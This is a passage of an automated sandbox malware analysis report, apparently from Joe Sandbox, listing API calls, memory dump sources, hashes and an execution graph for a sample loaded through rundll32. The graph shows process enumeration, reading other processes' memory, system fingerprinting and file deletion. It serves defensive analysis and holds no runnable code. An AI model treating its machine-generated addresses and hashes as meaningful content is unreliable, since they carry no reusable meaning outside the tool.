                                                                  • LocalAlloc.KERNEL32(00000040,40000022,823FDEC6,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00B24154
                                                                  • LocalAlloc.KERNEL32(00000040,3FFFFFFF,823FDEC6,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00B24177
                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B24217
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Local$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 2012307162-0
                                                                  • Opcode ID: ef00bf39949ad1fede58cb254e194d2c8a41a79b83e2c45859193df3db915861
                                                                  • Instruction ID: 82632985dadd1d28e1d9d54a231c0f459ff6a87889e80a855bab0d5d76ab3366
                                                                  • Opcode Fuzzy Hash: ef00bf39949ad1fede58cb254e194d2c8a41a79b83e2c45859193df3db915861
                                                                  • Instruction Fuzzy Hash: 1551DF71A102159FDB18CF68D985AAEBBF5FB48300F10466DF829E7780DB34AE50CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 00B21E01
                                                                  • LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 00B21E21
                                                                  • LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 00B21EA7
                                                                  • LocalFree.KERNEL32(00000001,823FDEC6,00000000,00000000,00B63C40,000000FF,?,00000000), ref: 00B21F2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.1997068000.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                  • Associated: 00000005.00000002.1997049517.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997150424.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000005.00000002.1997171475.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_b20000_MSID8B1.jbxd
                                                                  Similarity
                                                                  • API ID: Local$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 2012307162-0
                                                                  • Opcode ID: 901a6514de38188316b5df29d87958af4a6b65b86485ed637a82703768509487
                                                                  • Instruction ID: 40c686e218f0c017adc80fd4b6846f3be929ef45d442de9da754c418c77349a1
                                                                  • Opcode Fuzzy Hash: 901a6514de38188316b5df29d87958af4a6b65b86485ed637a82703768509487
                                                                  • Instruction Fuzzy Hash: 475104725042219FC715EF2CEC80A6BB7E8FF58360F110AAEF81AD7690DB30D9008791
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage: 1.3%
                                                                  Dynamic/Decrypted Code Coverage: 98.2%
                                                                  Signature Coverage: 3.1%
                                                                  Total number of Nodes: 383
                                                                  Total number of Limit Nodes: 10
                                                                  execution_graph 50524 180078460 50525 180078498 __GSHandlerCheckCommon 50524->50525 50526 1800784c4 50525->50526 50528 180070210 50525->50528 50529 18007021c 50528->50529 50529->50529 50530 180070253 VirtualAlloc 50529->50530 50531 180070278 50530->50531 50531->50526 50532 1fb3ab73ce4 50535 1fb3ab73cb4 50532->50535 50541 1fb3ab73868 50535->50541 50537 1fb3ab73cbd 50538 1fb3ab73cdb 50537->50538 50539 1fb3ab73ccf 50537->50539 50539->50537 50573 1fb3ab7cb54 NtDelayExecution 50539->50573 50542 1fb3ab73888 50541->50542 50574 1fb3ab76328 50542->50574 50544 1fb3ab7388d 50560 1fb3ab73891 50544->50560 50586 1fb3ab78560 50544->50586 50548 1fb3ab738bc 50549 1fb3ab78820 4 API calls 50548->50549 50548->50560 50550 1fb3ab738d7 50549->50550 50551 1fb3ab738ed GetCurrentProcess IsWow64Process 50550->50551 50550->50560 50552 1fb3ab7391a 50551->50552 50551->50560 50597 1fb3ab768e8 GetAdaptersInfo 50552->50597 50554 1fb3ab7391f 50555 1fb3ab73959 CreateMutexW 50554->50555 50554->50560 50556 1fb3ab73979 GetLastError 50555->50556 50555->50560 50557 1fb3ab7399c GetModuleHandleW 50556->50557 50556->50560 50604 1fb3ab7463c GetModuleHandleW GetCurrentProcessId 50557->50604 50560->50537 50562 1fb3ab739c1 50562->50560 50632 1fb3ab76864 NtAllocateVirtualMemory 50562->50632 50564 1fb3ab739d1 50564->50560 50633 1fb3ab7d134 17 API calls new[] 50564->50633 50566 1fb3ab739e1 50634 1fb3ab7378c 50566->50634 50569 1fb3ab739f9 50699 1fb3ab76250 CreateThread 50569->50699 50572 1fb3ab73a11 50572->50560 50573->50539 50576 1fb3ab76331 50574->50576 50575 1fb3ab76367 50575->50544 50576->50575 50700 1fb3ab7a59c GetProcAddress 50576->50700 50578 1fb3ab76343 50578->50575 50701 1fb3ab79484 GetProcAddress 50578->50701 50580 1fb3ab7634c 50580->50575 50702 1fb3ab7a47c 50580->50702 50584 1fb3ab7635e 50584->50575 50707 1fb3ab7ac50 GetProcAddress 50584->50707 50587 1fb3ab7857e 50586->50587 50588 1fb3ab78590 RtlGetVersion 50587->50588 50589 1fb3ab7859b 
50587->50589 50588->50589 50590 1fb3ab785a5 GetVersionExW 50589->50590 50591 1fb3ab738b3 50589->50591 50590->50591 50592 1fb3ab78820 CreateToolhelp32Snapshot 50591->50592 50593 1fb3ab7ae1c 50592->50593 50594 1fb3ab78850 Process32FirstW 50593->50594 50595 1fb3ab7886c Process32NextW 50594->50595 50596 1fb3ab7888a CloseHandle 50594->50596 50595->50595 50595->50596 50596->50548 50598 1fb3ab76921 50597->50598 50599 1fb3ab76945 50597->50599 50600 1fb3ab7ad34 NtAllocateVirtualMemory 50598->50600 50601 1fb3ab76953 50599->50601 50603 1fb3ab77b40 NtFreeVirtualMemory 50599->50603 50602 1fb3ab7692c GetAdaptersInfo 50600->50602 50601->50554 50602->50599 50603->50601 50750 1fb3ab77b80 50604->50750 50608 1fb3ab78560 2 API calls 50623 1fb3ab74690 50608->50623 50609 1fb3ab74743 GetCurrentProcessId 50609->50623 50610 1fb3ab7478d GetCurrentProcessId OpenProcess 50612 1fb3ab747b4 NtQueryInformationProcess 50610->50612 50610->50623 50616 1fb3ab74b27 CloseHandle 50612->50616 50612->50623 50613 1fb3ab74c12 50614 1fb3ab739b1 50613->50614 50615 1fb3ab74c23 50613->50615 50614->50560 50631 1fb3ab76988 NtAllocateVirtualMemory 50614->50631 50761 1fb3ab74c38 CloseHandle NtFreeVirtualMemory 50615->50761 50616->50623 50618 1fb3ab7476b 50618->50610 50760 1fb3ab7841c NtFreeVirtualMemory GetModuleFileNameW NtAllocateVirtualMemory 50618->50760 50619 1fb3ab7482a ReadProcessMemory 50619->50616 50621 1fb3ab74881 ReadProcessMemory 50619->50621 50620 1fb3ab74b3c 50620->50613 50622 1fb3ab7bb2c NtAllocateVirtualMemory 50620->50622 50621->50616 50621->50623 50626 1fb3ab74b71 50622->50626 50623->50608 50623->50609 50623->50610 50623->50616 50623->50618 50623->50619 50623->50620 50624 1fb3ab7ad34 NtAllocateVirtualMemory 50623->50624 50625 1fb3ab74907 WideCharToMultiByte 50624->50625 50630 1fb3ab7496a 50625->50630 50626->50613 50628 1fb3ab77b40 NtFreeVirtualMemory 50626->50628 50627 1fb3ab76298 MultiByteToWideChar NtAllocateVirtualMemory 50627->50630 50628->50613 50629 1fb3ab77b40 NtFreeVirtualMemory 
50629->50616 50630->50627 50630->50629 50631->50562 50632->50564 50633->50566 50784 1fb3ab73250 50634->50784 50637 1fb3ab737b3 50637->50569 50643 1fb3ab733ac 50637->50643 50644 1fb3ab730d0 12 API calls 50643->50644 50645 1fb3ab733f7 50644->50645 50646 1fb3ab73404 50645->50646 50647 1fb3ab73250 12 API calls 50645->50647 50646->50569 50648 1fb3ab73410 50647->50648 50648->50646 50649 1fb3ab7bb2c NtAllocateVirtualMemory 50648->50649 50650 1fb3ab73437 50649->50650 50651 1fb3ab76b9c 3 API calls 50650->50651 50652 1fb3ab73446 50651->50652 50653 1fb3ab76b9c 3 API calls 50652->50653 50654 1fb3ab73450 50653->50654 50895 1fb3ab77588 50654->50895 50656 1fb3ab73712 50657 1fb3ab77b40 NtFreeVirtualMemory 50656->50657 50657->50646 50658 1fb3ab7345a 50658->50656 50659 1fb3ab7bb2c NtAllocateVirtualMemory 50658->50659 50660 1fb3ab7347c 50659->50660 50661 1fb3ab76b9c 3 API calls 50660->50661 50662 1fb3ab7348b 50661->50662 50903 1fb3ab77504 50662->50903 50664 1fb3ab7349d 50664->50646 50665 1fb3ab734dd wsprintfW 50664->50665 50666 1fb3ab73597 50665->50666 50667 1fb3ab734fd 50665->50667 50668 1fb3ab735cc wsprintfW 50666->50668 50669 1fb3ab73532 wsprintfW 50667->50669 50670 1fb3ab735f3 50668->50670 50671 1fb3ab7355e 50669->50671 50673 1fb3ab73614 wsprintfW 50670->50673 50672 1fb3ab7357f wsprintfW 50671->50672 50674 1fb3ab7363f 50672->50674 50673->50674 50913 1fb3ab73728 50674->50913 50677 1fb3ab77b40 NtFreeVirtualMemory 50678 1fb3ab73668 50677->50678 50679 1fb3ab77b40 NtFreeVirtualMemory 50678->50679 50680 1fb3ab73672 50679->50680 50681 1fb3ab77b40 NtFreeVirtualMemory 50680->50681 50682 1fb3ab7367f 50681->50682 50920 1fb3ab73c2c 50682->50920 50687 1fb3ab7ad34 NtAllocateVirtualMemory 50688 1fb3ab7369f 50687->50688 50689 1fb3ab73703 ExitProcess 50688->50689 50690 1fb3ab7ba98 3 API calls 50688->50690 50689->50656 50691 1fb3ab736be 50690->50691 50692 1fb3ab736ea 50691->50692 50694 1fb3ab7ba98 3 API calls 50691->50694 50940 1fb3ab7b400 50692->50940 50695 1fb3ab736d8 50694->50695 50697 
1fb3ab7ba98 3 API calls 50695->50697 50697->50692 50698 1fb3ab77b40 NtFreeVirtualMemory 50698->50689 50699->50572 50700->50578 50701->50580 50705 1fb3ab7a53f 50702->50705 50703 1fb3ab76355 50703->50575 50706 1fb3ab7904c GetProcAddress 50703->50706 50705->50703 50708 1fb3ab7a350 50705->50708 50706->50584 50707->50575 50720 1fb3ab78a94 50708->50720 50710 1fb3ab7a36d 50710->50705 50711 1fb3ab7a360 50711->50710 50726 1fb3ab7ba98 50711->50726 50713 1fb3ab7a3af 50713->50710 50714 1fb3ab7a3d5 FindFirstFileW 50713->50714 50715 1fb3ab7a413 50714->50715 50718 1fb3ab7a3f5 50714->50718 50730 1fb3ab77b40 50715->50730 50716 1fb3ab7a3fc FindNextFileW 50716->50715 50716->50718 50718->50715 50718->50716 50719 1fb3ab7a44e LoadLibraryW 50718->50719 50719->50715 50733 1fb3ab7ae1c 50720->50733 50723 1fb3ab78abe 50735 1fb3ab7bb2c 50723->50735 50724 1fb3ab78ad4 50724->50711 50727 1fb3ab7bab0 50726->50727 50740 1fb3ab7ba2c 50727->50740 50729 1fb3ab7bad9 50729->50713 50731 1fb3ab77b7b 50730->50731 50732 1fb3ab77b5a NtFreeVirtualMemory 50730->50732 50731->50710 50732->50731 50734 1fb3ab78aaa GetSystemDirectoryW 50733->50734 50734->50723 50734->50724 50738 1fb3ab7ad34 NtAllocateVirtualMemory 50735->50738 50737 1fb3ab7bb54 50737->50724 50739 1fb3ab7ad74 50738->50739 50739->50737 50743 1fb3ab7b058 50740->50743 50742 1fb3ab7ba60 50742->50729 50744 1fb3ab7b06c 50743->50744 50745 1fb3ab7b087 50743->50745 50746 1fb3ab77b40 NtFreeVirtualMemory 50744->50746 50749 1fb3ab7af9c NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 50745->50749 50748 1fb3ab7b079 50746->50748 50748->50742 50749->50748 50762 1fb3ab789d4 50750->50762 50755 1fb3ab78ae0 50756 1fb3ab7ae1c 50755->50756 50757 1fb3ab78afe GetUserNameA 50756->50757 50758 1fb3ab78b12 wsprintfA 50757->50758 50759 1fb3ab78b2b 50757->50759 50758->50759 50759->50623 50760->50618 50761->50614 50763 1fb3ab789f2 50762->50763 50764 1fb3ab78a04 FindFirstVolumeW 50763->50764 50765 1fb3ab77b89 50764->50765 50766 1fb3ab78a25 GetVolumeInformationW 
FindVolumeClose 50764->50766 50767 1fb3ab78bbc 50765->50767 50766->50765 50768 1fb3ab78be5 50767->50768 50777 1fb3ab78d4c 50768->50777 50771 1fb3ab74684 50771->50755 50772 1fb3ab7ad34 NtAllocateVirtualMemory 50773 1fb3ab78c07 50772->50773 50774 1fb3ab78c35 50773->50774 50782 1fb3ab7b984 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 50773->50782 50776 1fb3ab77b40 NtFreeVirtualMemory 50774->50776 50776->50771 50778 1fb3ab7ad34 NtAllocateVirtualMemory 50777->50778 50779 1fb3ab78d68 50778->50779 50780 1fb3ab78bef 50779->50780 50783 1fb3ab78c4c wsprintfA 50779->50783 50780->50771 50780->50772 50782->50774 50783->50780 50785 1fb3ab789d4 3 API calls 50784->50785 50786 1fb3ab73276 50785->50786 50817 1fb3ab73194 50786->50817 50788 1fb3ab7327e 50798 1fb3ab7328b 50788->50798 50823 1fb3ab730d0 50788->50823 50791 1fb3ab7335c 50792 1fb3ab77b40 NtFreeVirtualMemory 50791->50792 50794 1fb3ab73384 50792->50794 50793 1fb3ab7ba98 3 API calls 50795 1fb3ab73336 50793->50795 50796 1fb3ab77b40 NtFreeVirtualMemory 50794->50796 50794->50798 50795->50791 50797 1fb3ab7ba98 3 API calls 50795->50797 50796->50798 50799 1fb3ab73349 50797->50799 50798->50637 50801 1fb3ab76b9c 50798->50801 50799->50791 50800 1fb3ab7ba98 3 API calls 50799->50800 50800->50791 50890 1fb3ab78fe8 50801->50890 50804 1fb3ab7ba98 3 API calls 50805 1fb3ab76bd7 50804->50805 50806 1fb3ab76c12 50805->50806 50807 1fb3ab7ba98 3 API calls 50805->50807 50809 1fb3ab77b40 NtFreeVirtualMemory 50806->50809 50812 1fb3ab737c1 50806->50812 50808 1fb3ab76bed 50807->50808 50808->50806 50810 1fb3ab76bf1 50808->50810 50809->50812 50811 1fb3ab77b40 NtFreeVirtualMemory 50810->50811 50811->50812 50813 1fb3ab777b0 50812->50813 50814 1fb3ab777f1 50813->50814 50815 1fb3ab77803 RtlInitUnicodeString NtCreateFile 50814->50815 50816 1fb3ab737e5 NtClose 50815->50816 50816->50637 50818 1fb3ab731d6 50817->50818 50819 1fb3ab73215 wsprintfW 50818->50819 50820 1fb3ab73243 50819->50820 50821 1fb3ab73235 50819->50821 50820->50788 50822 1fb3ab7bb2c 
NtAllocateVirtualMemory 50821->50822 50822->50820 50824 1fb3ab789d4 3 API calls 50823->50824 50825 1fb3ab730f6 50824->50825 50826 1fb3ab73194 2 API calls 50825->50826 50827 1fb3ab730fe 50826->50827 50835 1fb3ab7310b 50827->50835 50836 1fb3ab77b98 50827->50836 50829 1fb3ab7315e 50830 1fb3ab77b40 NtFreeVirtualMemory 50829->50830 50832 1fb3ab7316c 50830->50832 50831 1fb3ab73116 50831->50829 50834 1fb3ab7ba98 3 API calls 50831->50834 50833 1fb3ab77b40 NtFreeVirtualMemory 50832->50833 50832->50835 50833->50835 50834->50829 50835->50791 50835->50793 50837 1fb3ab77bb5 50836->50837 50843 1fb3ab77bbf 50837->50843 50844 1fb3ab7b154 50837->50844 50839 1fb3ab77e42 50840 1fb3ab7ba98 3 API calls 50839->50840 50839->50843 50841 1fb3ab77e65 50840->50841 50842 1fb3ab77b40 NtFreeVirtualMemory 50841->50842 50841->50843 50842->50843 50843->50831 50853 1fb3ab788f8 50844->50853 50847 1fb3ab7b192 50847->50839 50848 1fb3ab7ba98 3 API calls 50849 1fb3ab7b1a5 50848->50849 50850 1fb3ab7b1bd 50849->50850 50865 1fb3ab7b1d4 50849->50865 50852 1fb3ab77b40 NtFreeVirtualMemory 50850->50852 50852->50847 50854 1fb3ab7895b 50853->50854 50856 1fb3ab78916 50853->50856 50855 1fb3ab7896a RtlFormatCurrentUserKeyPath 50854->50855 50857 1fb3ab78979 50855->50857 50860 1fb3ab78951 50855->50860 50859 1fb3ab7ba98 3 API calls 50856->50859 50858 1fb3ab7ba98 3 API calls 50857->50858 50858->50860 50859->50860 50861 1fb3ab78955 50860->50861 50862 1fb3ab7ba98 3 API calls 50860->50862 50861->50847 50861->50848 50863 1fb3ab789af 50862->50863 50863->50861 50864 1fb3ab77b40 NtFreeVirtualMemory 50863->50864 50864->50861 50881 1fb3ab7bf4c 50865->50881 50868 1fb3ab7b20d 50868->50850 50870 1fb3ab7b22c 50870->50868 50871 1fb3ab7b246 NtQueryValueKey 50870->50871 50871->50868 50872 1fb3ab7b27e 50871->50872 50873 1fb3ab7ad34 NtAllocateVirtualMemory 50872->50873 50874 1fb3ab7b289 50873->50874 50875 1fb3ab7b32f NtClose 50874->50875 50876 1fb3ab7b29a NtQueryValueKey 50874->50876 50875->50868 50877 1fb3ab7b2cb 50876->50877 50878 
1fb3ab7b2df 50876->50878 50879 1fb3ab7ad34 NtAllocateVirtualMemory 50877->50879 50880 1fb3ab77b40 NtFreeVirtualMemory 50878->50880 50879->50878 50880->50875 50882 1fb3ab7b209 50881->50882 50883 1fb3ab7bf66 50881->50883 50882->50868 50885 1fb3ab7b0c4 50882->50885 50884 1fb3ab7bb2c NtAllocateVirtualMemory 50883->50884 50884->50882 50886 1fb3ab7bf4c NtAllocateVirtualMemory 50885->50886 50887 1fb3ab7b0f1 50886->50887 50888 1fb3ab7b0f5 50887->50888 50889 1fb3ab7b108 NtOpenKey 50887->50889 50888->50870 50889->50888 50891 1fb3ab7bb2c NtAllocateVirtualMemory 50890->50891 50893 1fb3ab79008 50891->50893 50892 1fb3ab76bbb 50892->50804 50892->50812 50893->50892 50894 1fb3ab77b40 NtFreeVirtualMemory 50893->50894 50894->50892 50896 1fb3ab775ae 50895->50896 50897 1fb3ab775c0 RtlInitUnicodeString 50896->50897 50945 1fb3ab77414 GetFileAttributesW 50897->50945 50900 1fb3ab7760e NtCreateFile 50901 1fb3ab77607 50900->50901 50902 1fb3ab77673 NtClose 50900->50902 50901->50658 50902->50901 50947 1fb3ab779c8 50903->50947 50906 1fb3ab77537 50906->50664 50909 1fb3ab77572 50912 1fb3ab77b40 NtFreeVirtualMemory 50909->50912 50910 1fb3ab77568 50961 1fb3ab77694 RtlInitUnicodeString NtDeleteFile 50910->50961 50912->50906 50914 1fb3ab78ae0 2 API calls 50913->50914 50915 1fb3ab73762 50914->50915 50976 1fb3ab76298 50915->50976 50919 1fb3ab7365e 50919->50677 50921 1fb3ab73c42 SetEvent 50920->50921 50922 1fb3ab73c4f 50920->50922 50921->50922 50923 1fb3ab73c59 ReleaseMutex CloseHandle 50922->50923 50924 1fb3ab73690 50922->50924 50923->50924 50925 1fb3ab73a24 50924->50925 50926 1fb3ab73a42 CreateFileW 50925->50926 50938 1fb3ab73695 50925->50938 50927 1fb3ab73a8a 50926->50927 50926->50938 50928 1fb3ab7ad34 NtAllocateVirtualMemory 50927->50928 50929 1fb3ab73af5 50928->50929 50930 1fb3ab73b1b SetFileInformationByHandle 50929->50930 50929->50938 50931 1fb3ab73b7b 50930->50931 50932 1fb3ab73b67 50930->50932 50934 1fb3ab77b40 NtFreeVirtualMemory 50931->50934 50933 1fb3ab77b40 NtFreeVirtualMemory 50932->50933 
50933->50938 50935 1fb3ab73b85 CloseHandle CreateFileW 50934->50935 50936 1fb3ab73bd5 50935->50936 50935->50938 50937 1fb3ab73be9 SetFileInformationByHandle 50936->50937 50937->50938 50939 1fb3ab73c14 CloseHandle 50937->50939 50938->50687 50939->50938 50941 1fb3ab7b41a 50940->50941 50942 1fb3ab7b452 CreateProcessW 50941->50942 50943 1fb3ab736f9 50942->50943 50944 1fb3ab7b4a6 CloseHandle CloseHandle 50942->50944 50943->50698 50944->50943 50946 1fb3ab77439 50945->50946 50946->50900 50946->50901 50948 1fb3ab777b0 2 API calls 50947->50948 50949 1fb3ab779fe 50948->50949 50950 1fb3ab77533 50949->50950 50962 1fb3ab77768 50949->50962 50950->50906 50955 1fb3ab77acc 50950->50955 50956 1fb3ab777b0 2 API calls 50955->50956 50957 1fb3ab77b07 50956->50957 50958 1fb3ab77557 50957->50958 50974 1fb3ab77a54 NtWriteFile 50957->50974 50958->50906 50958->50909 50958->50910 50961->50909 50970 1fb3ab77704 50962->50970 50965 1fb3ab778c0 50966 1fb3ab7ad34 NtAllocateVirtualMemory 50965->50966 50967 1fb3ab7793a 50966->50967 50968 1fb3ab77957 NtReadFile 50967->50968 50969 1fb3ab77953 NtClose 50967->50969 50968->50969 50969->50950 50971 1fb3ab77721 50970->50971 50972 1fb3ab77730 NtQueryInformationFile 50971->50972 50973 1fb3ab77757 50972->50973 50973->50950 50973->50965 50975 1fb3ab77abc NtClose 50974->50975 50975->50958 50977 1fb3ab762b4 50976->50977 50978 1fb3ab7ad34 NtAllocateVirtualMemory 50977->50978 50979 1fb3ab762c9 50978->50979 50980 1fb3ab7376a 50979->50980 50981 1fb3ab762f0 MultiByteToWideChar 50979->50981 50982 1fb3ab7b344 50980->50982 50981->50980 50983 1fb3ab7b35e 50982->50983 50985 1fb3ab7b369 50983->50985 50986 1fb3ab7c2c4 50983->50986 50985->50919 50987 1fb3ab7c30c 50986->50987 50989 1fb3ab7c317 50987->50989 50990 1fb3ab7c478 50987->50990 50989->50985 50992 1fb3ab7c4c3 50990->50992 50991 1fb3ab7c4ce 50991->50989 50992->50991 50993 1fb3ab789d4 3 API calls 50992->50993 50996 1fb3ab7c5c0 50993->50996 50994 1fb3ab7c683 50995 1fb3ab7ad34 NtAllocateVirtualMemory 50994->50995 51002 
1fb3ab7c6a2 50995->51002 50996->50994 50997 1fb3ab7ad34 NtAllocateVirtualMemory 50996->50997 50998 1fb3ab7c5ff 50997->50998 50999 1fb3ab7c642 wsprintfW 50998->50999 51000 1fb3ab7c676 50999->51000 51001 1fb3ab77b40 NtFreeVirtualMemory 51000->51001 51001->50994 51003 1fb3ab7c76f wsprintfW 51002->51003 51004 1fb3ab7c7da 51003->51004 51005 1fb3ab77b40 NtFreeVirtualMemory 51004->51005 51005->50991

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 1fb3ab7463c-1fb3ab746b9 GetModuleHandleW GetCurrentProcessId call 1fb3ab77b80 call 1fb3ab78ae0 call 1fb3ab7ae78 7 1fb3ab746cd-1fb3ab746d5 0->7 8 1fb3ab746bb-1fb3ab746cb 0->8 9 1fb3ab746dd-1fb3ab7470b call 1fb3ab7bc1c call 1fb3ab7cbbc 7->9 8->9 14 1fb3ab74711-1fb3ab7471d 9->14 15 1fb3ab7471f-1fb3ab7472f call 1fb3ab78560 call 1fb3ab78fe0 14->15 16 1fb3ab74735-1fb3ab74741 14->16 15->16 18 1fb3ab7474f-1fb3ab7475b 16->18 19 1fb3ab74743-1fb3ab74749 GetCurrentProcessId 16->19 20 1fb3ab74b32-1fb3ab74b36 18->20 21 1fb3ab74761-1fb3ab74769 18->21 19->18 20->14 25 1fb3ab74b3c-1fb3ab74b44 20->25 23 1fb3ab7478d-1fb3ab747ae GetCurrentProcessId OpenProcess 21->23 24 1fb3ab7476b-1fb3ab74783 call 1fb3ab7841c 21->24 23->20 28 1fb3ab747b4-1fb3ab74815 NtQueryInformationProcess 23->28 24->23 39 1fb3ab74785 24->39 29 1fb3ab74c1c-1fb3ab74c21 25->29 30 1fb3ab74b4a-1fb3ab74b82 call 1fb3ab7bc64 call 1fb3ab7bb2c 25->30 35 1fb3ab7481b-1fb3ab74824 28->35 36 1fb3ab74b27-1fb3ab74b2c CloseHandle 28->36 32 1fb3ab74c28-1fb3ab74c34 29->32 33 1fb3ab74c23 call 1fb3ab74c38 29->33 46 1fb3ab74b88-1fb3ab74b9f call 1fb3ab7ae78 30->46 47 1fb3ab74c14 30->47 33->32 35->36 40 1fb3ab7482a-1fb3ab7487b ReadProcessMemory 35->40 36->20 39->23 40->36 42 1fb3ab74881-1fb3ab748d5 ReadProcessMemory 40->42 42->36 44 1fb3ab748db-1fb3ab748e5 42->44 44->36 48 1fb3ab748eb-1fb3ab74999 call 1fb3ab7ad34 WideCharToMultiByte call 1fb3ab7bfcc * 2 44->48 53 1fb3ab74ba1-1fb3ab74bb1 46->53 54 1fb3ab74bb3-1fb3ab74bbb 46->54 47->29 62 1fb3ab7499b-1fb3ab749d2 call 1fb3ab7bfcc 48->62 63 1fb3ab749f4-1fb3ab749fa 48->63 56 1fb3ab74bc3-1fb3ab74be7 call 1fb3ab7beb0 call 1fb3ab7b900 53->56 54->56 71 1fb3ab74be9-1fb3ab74bf1 56->71 72 1fb3ab74bf3 56->72 62->63 74 1fb3ab749d4-1fb3ab749ef call 1fb3ab7bfcc 62->74 66 1fb3ab74a1c-1fb3ab74a53 call 1fb3ab76298 * 2 63->66 67 1fb3ab749fc-1fb3ab74a17 call 1fb3ab7bfcc 63->67 84 1fb3ab74a59 66->84 85 
1fb3ab74b04-1fb3ab74b09 66->85 67->66 76 1fb3ab74bfb-1fb3ab74c12 call 1fb3ab77b40 71->76 72->76 74->63 76->29 86 1fb3ab74a62-1fb3ab74a7e call 1fb3ab7bd7c 84->86 87 1fb3ab74b1d-1fb3ab74b22 call 1fb3ab77b40 85->87 88 1fb3ab74b0b-1fb3ab74b13 85->88 93 1fb3ab74a80-1fb3ab74aaa call 1fb3ab7bc1c call 1fb3ab7ad90 86->93 94 1fb3ab74aac-1fb3ab74ac1 86->94 87->36 88->87 90 1fb3ab74b15 88->90 90->87 93->86 96 1fb3ab74af3-1fb3ab74afd call 1fb3ab76298 94->96 97 1fb3ab74ac3-1fb3ab74af1 call 1fb3ab7bc1c call 1fb3ab76298 94->97 96->85 97->85
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$CurrentMemory$HandleRead$AllocateByteCharCloseInformationModuleMultiNameOpenQueryUserVirtualWidewsprintf
                                                                  • String ID:
                                                                  • API String ID: 3997021431-0
                                                                  • Opcode ID: 4fcbf81e38295e8c30bf4c4e02621455fce0c4a51cb942f1f600040aacfb28cd
                                                                  • Instruction ID: cc63b39d3714fda7f396af326f9f0bff73ea2c2c2eaf72ce8f13dea13ddca1d5
                                                                  • Opcode Fuzzy Hash: 4fcbf81e38295e8c30bf4c4e02621455fce0c4a51cb942f1f600040aacfb28cd
                                                                  • Instruction Fuzzy Hash: 02F14E3DA8CB8685E760DB24E4843EAB3A8FB84784F600135D68D87799EF7ED445CB01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$AttributesCloseCreateInitStringUnicode
                                                                  • String ID: 0$@
                                                                  • API String ID: 2504508917-1545510068
                                                                  • Opcode ID: 76083a2609edba1498485c59019560715fe1d99402632d84a6ddf28b8a5ccd31
                                                                  • Instruction ID: 6a8a4288ff1a11caf3ac7d6b287c3b10e597fdb3a734a7c47523e01b49a67e89
                                                                  • Opcode Fuzzy Hash: 76083a2609edba1498485c59019560715fe1d99402632d84a6ddf28b8a5ccd31
                                                                  • Instruction Fuzzy Hash: 9621247A5187C187E7609F14E09439BB7A8F7C0348F604125E6C947AA9EBBEE489CF41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996586579.000001FB3AB70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001FB3AB70000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_1fb3ab70000_rundll32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFileInitStringUnicode
                                                                  • String ID: 0$@
                                                                  • API String ID: 2498367268-1545510068
                                                                  • Opcode ID: 04c235c605806e9dc8f2c28b84d8f7d6f4de585734f90aa2da62749025ce9b27
                                                                  • Instruction ID: a9d248d79d1bb2ba4c75fcb99962b3901e505d996d6585e0425ae5490bf1efd4
                                                                  • Opcode Fuzzy Hash: 04c235c605806e9dc8f2c28b84d8f7d6f4de585734f90aa2da62749025ce9b27
